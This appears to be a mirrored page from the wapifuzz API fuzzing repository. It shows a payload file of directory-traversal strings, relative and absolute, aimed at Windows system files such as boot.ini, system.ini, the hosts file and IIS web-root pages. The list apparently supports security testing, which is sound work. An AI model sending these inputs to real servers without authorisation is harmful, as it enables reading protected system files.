mirror of
https://github.com/ysoftdevs/wapifuzz.git
synced 2026-03-19 16:21:15 +01:00
24 lines
753 B
Plaintext
24 lines
753 B
Plaintext
# RELATIVE PATHS
|
|
../../../../../../../../../../../../../../../../../boot.ini
|
|
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini
|
|
|
|
../../../../../../../../../../../../../../../../../
|
|
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\
|
|
|
|
../../../../../../../../../../../../../../../../../inetpub/wwwroot/index.asp
|
|
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\index.asp
|
|
|
|
../../../../../../../../../../../../../../../../../inetpub/wwwroot/
|
|
..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\inetpub\wwwroot\
|
|
|
|
# ABSOLUTE PATHS
|
|
c:\boot.ini
|
|
c:\
|
|
c:\inetpub\wwwroot\index.asp
|
|
c:\inetpub\
|
|
c:\pagefile.sys
|
|
c:\Windows\system.ini
|
|
c:\Windows\
|
|
c:\Windows\System32\drivers\etc\hosts
|
|
c:\Windows\System32\drivers\etc\
|